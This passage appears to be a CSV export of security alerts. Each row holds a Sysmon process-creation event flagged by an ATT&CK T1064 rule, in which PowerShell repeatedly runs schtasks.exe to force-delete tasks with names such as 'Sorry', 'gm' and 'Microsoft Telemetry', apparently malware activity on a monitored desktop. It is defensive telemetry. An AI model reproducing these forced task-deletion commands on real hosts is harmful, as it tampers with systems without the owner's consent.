5272 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN Sorry /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Sorry /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:00.584731400Z"",""eventRecordID"":""3046"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:00.562\r\nProcessGuid: {df9fc3d3-b3b4-5ecf-0000-001012e02600}\r\nProcessId: 5272\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: 
\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Sorry /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:00.562"",""processGuid"":""{df9fc3d3-b3b4-5ecf-0000-001012e02600}"",""processId"":""5272"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN Sorry /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 
-s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:28.589",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:00.475 +ProcessGuid: {df9fc3d3-b3b4-5ecf-0000-001072dc2600} +ProcessId: 5196 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN ngm /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN ngm /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:00.480209700Z"",""eventRecordID"":""3045"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:00.475\r\nProcessGuid: {df9fc3d3-b3b4-5ecf-0000-001072dc2600}\r\nProcessId: 5196\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 
10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN ngm /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:00.475"",""processGuid"":""{df9fc3d3-b3b4-5ecf-0000-001072dc2600}"",""processId"":""5196"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN ngm /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John 
Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:28.551",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:00.393 +ProcessGuid: {df9fc3d3-b3b4-5ecf-0000-001025d92600} +ProcessId: 1688 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN gm /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN gm 
/F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:00.397984400Z"",""eventRecordID"":""3044"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:00.393\r\nProcessGuid: {df9fc3d3-b3b4-5ecf-0000-001025d92600}\r\nProcessId: 1688\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN gm /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:00.393"",""processGuid"":""{df9fc3d3-b3b4-5ecf-0000-001025d92600}"",""processId"":""1688"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration 
Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN gm /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:28.535",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:00.345 +ProcessGuid: {df9fc3d3-b3b4-5ecf-0000-001076d72600} +ProcessId: 7784 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN ""Update service for products"" /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 
6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN \""Update service for products\"" /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:00.357808900Z"",""eventRecordID"":""3043"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:00.345\r\nProcessGuid: {df9fc3d3-b3b4-5ecf-0000-001076d72600}\r\nProcessId: 7784\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN \""Update service for products\"" /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo 
-NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:00.345"",""processGuid"":""{df9fc3d3-b3b4-5ecf-0000-001076d72600}"",""processId"":""7784"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN \\\""Update service for products\\\"" /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:28.481",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:00.279 +ProcessGuid: {df9fc3d3-b3b4-5ecf-0000-001035d52600} +ProcessId: 6140 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN ""Oracle Products Reporter"" /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams 
+LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN \""Oracle Products Reporter\"" /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:00.284013600Z"",""eventRecordID"":""3042"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:00.279\r\nProcessGuid: {df9fc3d3-b3b4-5ecf-0000-001035d52600}\r\nProcessId: 6140\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN \""Oracle Products Reporter\"" /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: 
MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:00.279"",""processGuid"":""{df9fc3d3-b3b4-5ecf-0000-001035d52600}"",""processId"":""6140"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN \\\""Oracle Products Reporter\\\"" /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:28.474",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:00.221 +ProcessGuid: {df9fc3d3-b3b4-5ecf-0000-001083d32600} +ProcessId: 6284 +Image: 
C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN ""Spooler SubSystem Service"" /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN \""Spooler SubSystem Service\"" /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:00.234943900Z"",""eventRecordID"":""3041"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:00.221\r\nProcessGuid: {df9fc3d3-b3b4-5ecf-0000-001083d32600}\r\nProcessId: 6284\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: 
schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN \""Spooler SubSystem Service\"" /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:00.221"",""processGuid"":""{df9fc3d3-b3b4-5ecf-0000-001083d32600}"",""processId"":""6284"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN \\\""Spooler SubSystem Service\\\"" /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John 
Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:28.461",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:00.160 +ProcessGuid: {df9fc3d3-b3b4-5ecf-0000-0010f4d02600} +ProcessId: 1680 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN ""Microsoft Telemetry"" /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD 